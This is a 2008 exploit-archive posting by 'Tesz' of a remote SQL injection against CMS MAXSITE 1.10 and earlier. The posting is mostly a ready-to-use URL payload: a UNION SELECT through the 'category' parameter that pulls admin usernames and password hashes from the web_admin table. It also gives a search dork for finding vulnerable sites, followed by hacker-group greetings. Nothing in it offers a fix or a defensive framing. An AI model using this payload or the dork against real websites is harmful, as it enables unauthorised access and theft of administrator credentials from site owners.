CMS MAXSITE <= 1.10 (category) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CMS MAXSITE <= 1.10 (category) Remote SQL Injection Vulnerability
# Published : 2008-05-26
# Author : Tesz
# Previous Title : RoomPHPlanning 1.5 Multiple Remote SQL Injection Vulnerabilities
# Next Title : plusPHP URL Shortening Software 1.6 Remote File Inclusion Vulnerability

#########################################################################

CMS MAXSITE Remote SQL Injection Exploit <= 1.10

#########################################################################


[+] Author: Tesz [@] THD
[+] Home: http://www.thaishadow.com
[+] Forum: http://www.thaishadow.com/board/index.php

[+] Download: http://maxsite.geniuscyber.com/index.php?name=index

[+] Dork: MAXSITE or intitle:"MAXSITE"

[+] Exploit: http://server.com/path/index.php?name=webboard&category=1+and+1=2+union+select+concat(username,0x3A,password)+from+web_admin/*

[+] index.php?name=webboard&category=1+and+1=2+union+select+concat(username,0x3A,password)+from+web_admin/*

[+] Greetz: krit,Exploiters,PongZ,{OHM},Usermode,windows98SE,azazel,Mr`Ping,Os555,[T]he[S]hak
[+] Special Thx: THD (Thaishadow Team)


###########################################################################

# www.Syue.com [2008-05-26]